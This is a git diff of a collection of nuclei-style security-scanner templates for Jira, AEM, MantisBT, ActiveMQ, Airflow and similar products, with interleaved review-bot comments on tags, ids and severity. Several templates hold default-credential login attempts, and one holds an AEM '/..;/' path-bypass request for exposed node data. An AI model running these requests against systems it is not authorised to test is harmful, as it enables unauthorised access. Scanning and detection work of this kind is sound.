4a0a0047304502210099f7859c8f6312ba07f43ba7d80b6ced1937f1ffc2ae555b1ae5d11f1cdc797d02207e68b09ecc7c8f7767224d8b8e07d539a312323747af7ba36059c9c5bdb4a5c9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml b/poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml deleted file mode 100644 index 0049e91b4e..0000000000 --- a/poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml +++ /dev/null 
@@ -1,23 +0,0 @@ -id: jira-unauthenticated-popular-filters - -info: - name: Jira Unauthenticated Popular Filters - author: TechbrunchFR - severity: Info - -requests: - - method: GET - path: - - "{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular" - matchers: - - type: word - words: - - 'filterlink_' - -# Remediation: -# Ensure that this permission is restricted to specific groups that require it. -# You can restrict it in Administration > System > Global Permissions. -# Turning the feature off will not affect existing filters and dashboards. -# If you change this setting, you will still need to update the existing filters and dashboards if they have already been -# shared publicly. -# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. diff --git a/poc/atlassian/jira-unauthenticated-popular-filters.yaml b/poc/atlassian/jira-unauthenticated-popular-filters.yaml index 304d20f9a0..6fbda02ff3 100644 --- a/poc/atlassian/jira-unauthenticated-popular-filters.yaml +++ b/poc/atlassian/jira-unauthenticated-popular-filters.yaml @@ -1,9 +1,8 @@ -id: jira-unauth-popular-filters +id: jira-unauthenticated-popular-filters info: name: Jira Unauthenticated Popular Filters author: TechbrunchFR - severity: info - tags: atlassian,jira + severity: Info requests: - method: GET path: diff --git a/poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml b/poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml index 3d65baf18e..ff6dcd5d49 100644 --- a/poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml +++ b/poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml @@ -4,12 +4,9 @@ info: name: Jira Unauthenticated Project Categories author: TESS severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira -http: +requests: - method: GET path: - "{{BaseURL}}/rest/api/2/projectCategory?maxResults=1000" 
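Review bot: Dropping `tags: atlassian,jira` leaves poc/atlassian/jira-unauthenticated-popular-filters.yaml with no tags, so a scan selected by tag no longer runs this check; the other jira-unauthenticated-* templates in this commit keep that tags line. `severity: Info` also departs from the lowercase `info` used elsewhere on the page. Suggested lines: `severity: info` and `tags: atlassian,jira`. The `requests:` block continues outside this hunk.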
@@ -31,5 +28,3 @@ http: part: header words: - "atlassian.xsrf.token" - -# digest: 4b0a004830460221008f66b3babbdae57b4672c9d6216a67a6b8ca43341b00e673ace120d7b57348410221008bf9c86ab7e3683d0bf6c23dfd9d5220bdd0f070bcb849fbc025127939852ebd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-projectcategories-8332.yaml b/poc/atlassian/jira-unauthenticated-projectcategories.yaml similarity index 100% rename from poc/atlassian/jira-unauthenticated-projectcategories-8332.yaml rename to poc/atlassian/jira-unauthenticated-projectcategories.yaml diff --git a/poc/atlassian/jira-unauthenticated-user-picker-8341.yaml b/poc/atlassian/jira-unauthenticated-user-picker-8341.yaml index 0a88ec36aa..0ce9858072 100644 --- a/poc/atlassian/jira-unauthenticated-user-picker-8341.yaml +++ b/poc/atlassian/jira-unauthenticated-user-picker-8341.yaml @@ -1,22 +1,14 @@ id: jira-unauthenticated-user-picker - info: name: Jira Unauthenticated User Picker author: TechbrunchFR severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira - -http: +requests: - method: GET path: - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" - matchers: - type: word words: - 'user-picker' - -# digest: 490a0046304402200087bccdda4eb25b5110e1333de30442f5744e55aa8f2b5db3cf5d01c54e3837022068d85868176036eb3b1420b5aa186064b791ca1486a60f7e1c8fed872ad1f402:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira_user_piker (copy 1).yaml b/poc/atlassian/jira_user_piker (copy 1).yaml new file mode 100644 index 0000000000..0a88ec36aa --- /dev/null +++ b/poc/atlassian/jira_user_piker (copy 1).yaml 
@@ -0,0 +1,22 @@ +id: jira-unauthenticated-user-picker + +info: + name: Jira Unauthenticated User Picker + author: TechbrunchFR + severity: info + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" + tags: atlassian,jira + +http: + - method: GET + path: + - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" + + matchers: + - type: word + words: + - 'user-picker' + +# digest: 490a0046304402200087bccdda4eb25b5110e1333de30442f5744e55aa8f2b5db3cf5d01c54e3837022068d85868176036eb3b1420b5aa186064b791ca1486a60f7e1c8fed872ad1f402:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/AVTECH-login-bypass.yaml b/poc/auth/AVTECH-login-bypass.yaml index a92a77b6e9..5319f73458 100644 --- a/poc/auth/AVTECH-login-bypass.yaml +++ b/poc/auth/AVTECH-login-bypass.yaml @@ -1,10 +1,12 @@ id: AVTECH-login-bypass + info: name: AVTECH 登录绕过 author: Str1am severity: critical reference: https://www.seebug.org/vuldb/ssvid-92494 tags: AVTECH,login,bypass + requests: - method: GET path: diff --git a/poc/auth/Dynatrace-token (copy 1).yaml b/poc/auth/Dynatrace-token (copy 1).yaml deleted file mode 100644 index 0371d213d9..0000000000 --- a/poc/auth/Dynatrace-token (copy 1).yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: dynatrace-token - -info: - name: Dynatrace Token - author: gaurang - severity: high - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" \ No newline at end of file diff --git a/poc/auth/Dynatrace-token.yaml b/poc/auth/Dynatrace-token.yaml index 3fe0f4cf8f..0371d213d9 100644 --- a/poc/auth/Dynatrace-token.yaml +++ b/poc/auth/Dynatrace-token.yaml @@ -1,13 +1,15 @@ id: dynatrace-token + info: name: Dynatrace Token author: gaurang severity: high - tags: token,file + file: - extensions: - all + extractors: - type: regex regex: - - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" + - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" \ No newline at end of file 
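Review bot: The new file `jira_user_piker (copy 1).yaml` reuses `id: jira-unauthenticated-user-picker`, the id that jira-unauthenticated-user-picker-8341.yaml already carries, and its blob `0a88ec36aa` is the pre-change version of that file, so the repository now holds two templates reporting under one id. The filename also contains spaces and parentheses, which need quoting wherever a template path is passed on a command line. Either drop the copy or give it a distinct id and a plain filename. Separately, the only matcher is the body word `user-picker` with no status condition, so any response containing that string is reported; adding `matchers-condition: and` together with a status matcher for 200 would narrow it.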
diff --git a/poc/auth/JeeSite-default-login.yaml b/poc/auth/JeeSite-default-login.yaml index f737242f41..43ad9321e7 100644 --- a/poc/auth/JeeSite-default-login.yaml +++ b/poc/auth/JeeSite-default-login.yaml @@ -1,11 +1,9 @@ id: JeeSite-default-login - info: name: JeeSite默认密码 author: Str1am severity: high tags: JeeSite,login - requests: - raw: - | @@ -15,7 +13,6 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username=F3EDC7D2C193E0B8DCF554C726719ED2&password=235880C505ACCDA5C581A4F4CDB81DA0&validCode= - matchers-condition: and matchers: - type: status @@ -25,4 +22,4 @@ requests: words: - "登录成功" part: body - condition: and \ No newline at end of file + condition: and diff --git a/poc/auth/Mantis-Default_login.yaml b/poc/auth/Mantis-Default_login.yaml new file mode 100644 index 0000000000..079862ba31 --- /dev/null +++ b/poc/auth/Mantis-Default_login.yaml 
@@ -0,0 +1,47 @@
+id: mantisbt-default-credential
+
+info:
+ name: MantisBT Default Admin Login
+ author: For3stCo1d
+ severity: high
+ description: A MantisBT default admin login was discovered.
+ reference:
+ - https://mantisbt.org/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ metadata:
+ max-request: 1
+ shodan-query: title:"MantisBT"
+ tags: mantisbt,default-login
+
+http:
+ - raw:
+ - |
+ POST /login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ return=index.php&username={{user}}&password={{pass}}
+
+ attack: pitchfork
+ payloads:
+ user:
+ - administrator
+ pass:
+ - root
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - contains(tolower(header), 'mantis_secure_session')
+ - contains(tolower(header), 'mantis_string_cookie')
+ condition: and
+
+ - type: status
+ status:
+ - 302
+
+# digest: 490a0046304402205e3ba9080530721f7904ce8e6d98318f860b18d800d06370ccfd841b5de6ee8402201f73aac2837cd43bb2116deeddecd4ec504277ed0698a77d7c40c2a67bcf78b7:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/Redmine-Default-Login.yaml b/poc/auth/Redmine-Default-Login.yaml
deleted file mode 100644
index 66e6e4115a..0000000000
--- a/poc/auth/Redmine-Default-Login.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: RedMine-detect
-
-info:
- name: RedMine Detection
- author: YashVardhanTripathi
- severity: info
- description: RedMine Detection
- metadata:
- max-request: 1
- tags: tech, RedMine
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/login"
- host-redirects: true
- matchers:
- - type: word
- part: header
- words:
- - "Set-Cookie: Redmine="
diff --git a/poc/auth/acemanager-login-23.yaml b/poc/auth/acemanager-login-24.yaml
similarity index 100%
rename from poc/auth/acemanager-login-23.yaml
rename to poc/auth/acemanager-login-24.yaml
diff --git a/poc/auth/activemq-default-login-44.yaml b/poc/auth/activemq-default-login-44.yaml deleted file mode 100644 index 9714139497..0000000000 --- a/poc/auth/activemq-default-login-44.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: activemq-default-login - -info: - name: Apache ActiveMQ Default Login - author: pdteam - severity: medium - description: Apache ActiveMQ default login information was discovered. - reference: https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html - tags: apache,activemq,default-login - -requests: - - raw: - - | - GET /admin/ HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - - payloads: - username: - - user - - admin - password: - - user - - admin - attack: pitchfork - matchers: - - type: word - words: - - 'Welcome to the Apache ActiveMQ Console of ' - - '

Broker

' - condition: and - -# Enhanced by mp on 2022/03/07 diff --git a/poc/auth/activemq-default-login-46.yaml b/poc/auth/activemq-default-login-46.yaml index 843f3e8cab..9714139497 100644 --- a/poc/auth/activemq-default-login-46.yaml +++ b/poc/auth/activemq-default-login-46.yaml @@ -5,8 +5,7 @@ info: author: pdteam severity: medium description: Apache ActiveMQ default login information was discovered. - reference: - - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html + reference: https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html tags: apache,activemq,default-login requests: diff --git a/poc/auth/activemq-default-login-48.yaml b/poc/auth/activemq-default-login-48.yaml new file mode 100644 index 0000000000..a4dea884a5 --- /dev/null +++ b/poc/auth/activemq-default-login-48.yaml @@ -0,0 +1,29 @@ +id: activemq-default-login + +info: + name: Apache ActiveMQ Default Login + author: pdteam + severity: medium + tags: apache,activemq,default-login + +requests: + - raw: + - | + GET /admin/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - user + - admin + password: + - user + - admin + attack: pitchfork + matchers: + - type: word + words: + - 'Welcome to the Apache ActiveMQ Console of ' + - '

Broker

' + condition: and \ No newline at end of file diff --git a/poc/auth/adobe-component-login-89.yaml b/poc/auth/adobe-component-login-89.yaml new file mode 100644 index 0000000000..9b423f9a58 --- /dev/null +++ b/poc/auth/adobe-component-login-89.yaml @@ -0,0 +1,32 @@ +id: adobe-coldfusion-login + +info: + name: Adobe ColdFusion Component Browser Login Panel + author: dhiyaneshDK + description: An Adobe ColdFusion Component Browser login panel was detected. + severity: info + reference: + - https://www.exploit-db.com/ghdb/6846 + tags: panel,adobe,coldfusion + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/componentutils/login.cfm' + - '{{BaseURL}}/cfide/componentutils/login.cfm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Component Browser Login' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/adobe-component-login-90.yaml b/poc/auth/adobe-component-login-90.yaml deleted file mode 100644 index 1d46e94118..0000000000 --- a/poc/auth/adobe-component-login-90.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: adobe-coldfusion-login - -info: - name: Adobe ColdFusion Component Browser Login Panel - author: dhiyaneshDK - severity: info - description: An Adobe ColdFusion Component Browser login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6846 - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.component:"Adobe ColdFusion" - tags: panel,adobe,coldfusion - -requests: - - method: GET - path: - - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - - '{{BaseURL}}/cfide/componentutils/login.cfm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Component Browser Login' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 
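Review bot: The `classification` block added in adobe-component-login-89.yaml contains an empty `cve-id:` key, which parses as null and may be rejected by tooling that expects a string there; the line should be removed, since no CVE applies to a login-panel detection. `cvss-score: 0.0` with an all-None vector adds nothing to an `info` finding either, and the deleted adobe-component-login-90.yaml carried only `cwe-id: CWE-200`. The block also sits after `tags`, unlike Mantis-Default_login.yaml in this commit, where `classification` precedes `metadata` and `tags`. The same empty `cve-id:` is added in adobe-experience-manager-login-109.yaml and amcrest-login-297.yaml.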
diff --git a/poc/auth/adobe-component-login-91.yaml b/poc/auth/adobe-component-login-91.yaml new file mode 100644 index 0000000000..c0042aed5b --- /dev/null +++ b/poc/auth/adobe-component-login-91.yaml @@ -0,0 +1,23 @@ +id: adobe-component-login + +info: + name: Adobe Component Browser Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6846 + tags: panel,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/componentutils/login.cfm' + - '{{BaseURL}}/cfide/componentutils/login.cfm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Component Browser Login' + - type: status + status: + - 200 diff --git a/poc/auth/adobe-component-login-92.yaml b/poc/auth/adobe-component-login-92.yaml index cf0a6e2a19..cc39191db5 100644 --- a/poc/auth/adobe-component-login-92.yaml +++ b/poc/auth/adobe-component-login-92.yaml @@ -1,17 +1,15 @@ id: adobe-component-login - info: - name: Adobe Component Brower Login + name: Adobe Component Browser Login author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6846 - tags: panel - + tags: panel,adobe requests: - method: GET path: - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - + - '{{BaseURL}}/cfide/componentutils/login.cfm' matchers-condition: and matchers: - type: word diff --git a/poc/auth/adobe-connect-central-login-93.yaml b/poc/auth/adobe-connect-central-login-96.yaml similarity index 100% rename from poc/auth/adobe-connect-central-login-93.yaml rename to poc/auth/adobe-connect-central-login-96.yaml diff --git a/poc/auth/adobe-experience-manager-login-105.yaml b/poc/auth/adobe-experience-manager-login-105.yaml deleted file mode 100644 index 4dbdef1e18..0000000000 --- a/poc/auth/adobe-experience-manager-login-105.yaml +++ /dev/null 
@@ -1,33 +0,0 @@
-id: adobe-experience-manager-login
-
-info:
- name: Adobe Experience Manager Login Panel
- author: dhiyaneshDK
- description: An Adobe Experience Manager login panel was detected.
- severity: info
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22
- - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html
- tags: panel,aem,adobe
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
- cve-id:
- cwe-id: CWE-200
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/libs/granite/core/content/login.html'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'AEM Sign In'
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/20
diff --git a/poc/auth/adobe-experience-manager-login-106.yaml b/poc/auth/adobe-experience-manager-login-106.yaml
new file mode 100644
index 0000000000..2162a6646f
--- /dev/null
+++ b/poc/auth/adobe-experience-manager-login-106.yaml
@@ -0,0 +1,23 @@
+id: adobe-experience-manager-login
+
+info:
+ name: Adobe-Experience-Manager
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22
+ tags: panel,aem,adobe
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/libs/granite/core/content/login.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'AEM Sign In'
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/adobe-experience-manager-login-109.yaml b/poc/auth/adobe-experience-manager-login-109.yaml
index 9148cd29f0..4dbdef1e18 100644
--- a/poc/auth/adobe-experience-manager-login-109.yaml
+++ b/poc/auth/adobe-experience-manager-login-109.yaml
@@ -3,15 +3,17 @@ id: adobe-experience-manager-login info: name: Adobe Experience Manager Login Panel author: dhiyaneshDK - severity: info description: An Adobe Experience Manager login panel was detected. + severity: info reference: + - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html + tags: panel,aem,adobe classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: cwe-id: CWE-200 - metadata: - shodan-query: http.title:"AEM Sign In" - tags: panel,aem,adobe requests: - method: GET diff --git a/poc/auth/aem-default-login-140.yaml b/poc/auth/aem-default-login-140.yaml deleted file mode 100644 index 8072025a73..0000000000 --- a/poc/auth/aem-default-login-140.yaml +++ /dev/null 
@@ -1,56 +0,0 @@ -id: aem-default-login - -info: - name: Adobe AEM Default Login - author: random-robbie - severity: high - description: Adobe AEM default login credentials were discovered. - reference: - - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: aem,default-login,adobe - - -requests: - - raw: - - | - POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Origin: {{BaseURL}} - Referer: {{BaseURL}}/libs/granite/core/content/login.html - - _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true - - attack: pitchfork - payloads: - aem_user: - - admin - - grios - - replication-receiver - - vgnadmin - - aem_pass: - - admin - - password - - replication-receiver - - vgnadmin - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - condition: and - words: - - login-token - - crx.default - -# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/aem-default-login-141.yaml b/poc/auth/aem-default-login-141.yaml index 30c718c891..66a6189c19 100644 --- a/poc/auth/aem-default-login-141.yaml +++ b/poc/auth/aem-default-login-141.yaml @@ -12,11 +12,10 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 8 shodan-query: http.component:"Adobe Experience Manager" tags: aem,default-login,adobe -http: +requests: - raw: - | POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 @@ -38,6 +37,7 @@ http: - anonymous - jdoe@geometrixx.info - aparker@geometrixx.info + aem_pass: - admin - password @@ -47,8 +47,8 @@ http: - anonymous - jdoe - aparker - stop-at-first-match: true + stop-at-first-match: true matchers-condition: and matchers: - type: status 
@@ -62,4 +62,4 @@ http: - crx.default condition: and -# digest: 4a0a004730450220222a3b892a7451300a85043c153a1fbe5d336d8c9f30c474065214bbac5906bc022100981335810687d458df2fb4ca0c7698ec9597777f599956f12f0a62b18f285727:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/aem-default-login-142.yaml b/poc/auth/aem-default-login-142.yaml index 0f201e7c6b..8072025a73 100644 --- a/poc/auth/aem-default-login-142.yaml +++ b/poc/auth/aem-default-login-142.yaml @@ -3,9 +3,17 @@ id: aem-default-login info: name: Adobe AEM Default Login author: random-robbie - severity: critical + severity: high + description: Adobe AEM default login credentials were discovered. + reference: + - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: aem,default-login,adobe + requests: - raw: - | @@ -44,3 +52,5 @@ requests: words: - login-token - crx.default + +# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/aem-login-status-169.yaml b/poc/auth/aem-login-status-167.yaml similarity index 100% rename from poc/auth/aem-login-status-169.yaml rename to poc/auth/aem-login-status-167.yaml diff --git a/poc/auth/aem-secrets.yaml b/poc/auth/aem-secrets.yaml new file mode 100644 index 0000000000..4ac0aaf165 --- /dev/null +++ b/poc/auth/aem-secrets.yaml 
@@ -0,0 +1,44 @@
+id: aem-secrets
+
+info:
+ name: AEM Secrets - Sensitive Information Disclosure
+ author: j3ssie & boobooHQ
+ severity: high
+ reference:
+ - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/
+ description: |
+ Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc.
+ metadata:
+ max-request: 2
+ verified: "true"
+ tags: aem,adobe,misconfig,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"
+ - "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"
+
+ headers:
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Language: en-US,en;q=0.9,hi;q=0.8
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"jcr:uuid"'
+ - '"jcr:createdBy"'
+ - '"uri"'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - application/json
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/aims-password-mgmt-client-218.yaml b/poc/auth/aims-password-mgmt-client-219.yaml
similarity index 100%
rename from poc/auth/aims-password-mgmt-client-218.yaml
rename to poc/auth/aims-password-mgmt-client-219.yaml
diff --git a/poc/auth/aims-password-mgmt-client-221.yaml b/poc/auth/aims-password-mgmt-client-221.yaml
new file mode 100644
index 0000000000..76998f88a1
--- /dev/null
+++ b/poc/auth/aims-password-mgmt-client-221.yaml
@@ -0,0 +1,17 @@
+id: aims-password-mgmt-client
+
+info:
+ name: Aims Password Management Client Detect
+ author: iamthefrogy
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/aims/ps/"
+
+ matchers:
+ - type: word
+ words:
+ - "Avatier Corporation"
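Review bot: The `description` in aem-secrets.yaml tells the reader to search the response for secrets instead of stating what the template detects, and the `info` block has no `remediation` entry for a `severity: high` finding. Something like `description: AEM returns JCR node metadata as JSON from the formsanddocuments validator path to an unauthenticated request.` matches what the matchers check (`"jcr:uuid"`, `"jcr:createdBy"` and `"uri"` in a JSON 200 response). A `remediation:` line telling operators to deny this path, including the `/..;/` variant, at the dispatcher or reverse proxy would make the finding actionable. `author` would also read better as the comma-separated `j3ssie,boobooHQ`, which is the form I believe nuclei splits on.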
diff --git a/poc/auth/aims-password-portal-225.yaml b/poc/auth/aims-password-portal-225.yaml new file mode 100644 index 0000000000..800dd21cad --- /dev/null +++ b/poc/auth/aims-password-portal-225.yaml @@ -0,0 +1,22 @@ +id: aims-password-portal + +info: + name: AIMS Password Management Portal + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6576 + tags: panel,aims + +requests: + - method: GET + path: + - '{{BaseURL}}/aims/ps/default.aspx' + + matchers-condition: and + matchers: + - type: word + words: + - 'Password Management Client' + - type: status + status: + - 200 diff --git a/poc/auth/aims-password-portal.yaml b/poc/auth/aims-password-portal.yaml index 800dd21cad..eb21d8e0eb 100644 --- a/poc/auth/aims-password-portal.yaml +++ b/poc/auth/aims-password-portal.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6576 - tags: panel,aims + tags: panel requests: - method: GET diff --git a/poc/auth/airflow-default-login-236.yaml b/poc/auth/airflow-default-login-236.yaml index 7addbc0c1a..cef2568e5d 100644 --- a/poc/auth/airflow-default-login-236.yaml +++ b/poc/auth/airflow-default-login-236.yaml @@ -1,27 +1,18 @@ id: airflow-default-login - info: name: Apache Airflow Default Login author: pdteam - severity: high - description: An Apache Airflow default login was discovered. - reference: - - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + severity: critical + tags: airflow,default-login,apache + reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html metadata: shodan-query: title:"Sign In - Airflow" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: airflow,default-login,apache - requests: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /login/ HTTP/1.1 Host: {{Hostname}} 
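Review bot: `severity: critical` is set in the first airflow-default-login-236.yaml hunk while the `classification` block that justified the rating (`cvss-score: 8.3`, `cwe-id: CWE-522`) and the `description` are deleted, so the rating is now above what the removed score supported and nothing in the file explains it. aem-default-login-142.yaml in this same commit goes the other way, from `critical` to `high` with that same 8.3 vector, so default-login findings will be triaged inconsistently. Keep `severity: high` together with the `classification` block, or record in `description` why Airflow is rated differently. The request bodies and matchers are in later hunks of this file.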
@@ -30,14 +21,12 @@ requests: Referer: {{BaseURL}}/admin/airflow/login username={{username}}&password={{password}}&_csrf_token={{csrf_token}} - attack: pitchfork payloads: username: - airflow password: - airflow - cookie-reuse: true extractors: - type: regex @@ -46,7 +35,6 @@ requests: internal: true regex: - 'type="hidden" value="(.*?)">' - req-condition: true matchers-condition: and matchers: @@ -56,9 +44,6 @@ requests: - 'contains(all_headers_2, "session=.")' - 'status_code_2 == 302' condition: and - - type: word words: - 'You should be redirected automatically to target URL:
' - -# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/alibaba-mongoshake-unauth-268.yaml b/poc/auth/alibaba-mongoshake-unauth-268.yaml new file mode 100644 index 0000000000..6de46b6ec7 --- /dev/null +++ b/poc/auth/alibaba-mongoshake-unauth-268.yaml @@ -0,0 +1,27 @@ +id: alibaba-mongoshake-unauth + +info: + name: Alibaba Mongoshake Unauth + author: pikpikcu + severity: info + tags: mongoshake,unauth + +requests: + - method: GET + path: + - '{{BaseURL}}/' + + matchers-condition: and + matchers: + + - type: word + words: + - '{"Uri":"/worker","Method":"GET"}' + - type: word + words: + - 'text/plain' + part: header + + - type: status + status: + - 200 diff --git a/poc/auth/alibaba-mongoshake-unauth-270.yaml b/poc/auth/alibaba-mongoshake-unauth-270.yaml index 6de46b6ec7..5d0b6ed712 100644 --- a/poc/auth/alibaba-mongoshake-unauth-270.yaml +++ b/poc/auth/alibaba-mongoshake-unauth-270.yaml @@ -4,19 +4,21 @@ info: name: Alibaba Mongoshake Unauth author: pikpikcu severity: info - tags: mongoshake,unauth + metadata: + max-request: 1 + tags: mongoshake,unauth,alibaba,misconfig -requests: +http: - method: GET path: - '{{BaseURL}}/' matchers-condition: and matchers: - - type: word words: - '{"Uri":"/worker","Method":"GET"}' + - type: word words: - 'text/plain' @@ -25,3 +27,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a00473045022100df73190b4cb70a8ce254319365eb46566529f720568dd75e7c78ef98947776d602201c21217186da8ecab8fb38921f040a238ce5817e862ef108277fdfd8e53e7b52:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/alphaweb-default-login.yaml b/poc/auth/alphaweb-default-login.yaml deleted file mode 100644 index 6532087439..0000000000 --- a/poc/auth/alphaweb-default-login.yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: alphaweb-default-login - -info: - name: AlphaWeb XE Default Login - author: Lark Lab - severity: medium - tags: default-login - reference: https://wiki.zenitel.com/wiki/AlphaWeb - -requests: - - raw: - - | - GET /php/node_info.php HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - Referer: {{BaseURL}} - - attack: pitchfork - payloads: - username: - - admin - password: - - alphaadmin - - matchers-condition: and - matchers: - - type: word - words: - - "HW Configuration" - - "SW Configuration" - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/poc/auth/amazon-mws-auth-token-11845.yaml b/poc/auth/amazon-mws-auth-token-11845.yaml index 8ed5b31604..0ab5703b9c 100644 --- a/poc/auth/amazon-mws-auth-token-11845.yaml +++ b/poc/auth/amazon-mws-auth-token-11845.yaml @@ -1,15 +1,11 @@ id: amazon-mws-auth-token-value info: - name: Amazon MWS Authentication Token - Detect + name: Amazon MWS Auth Token author: 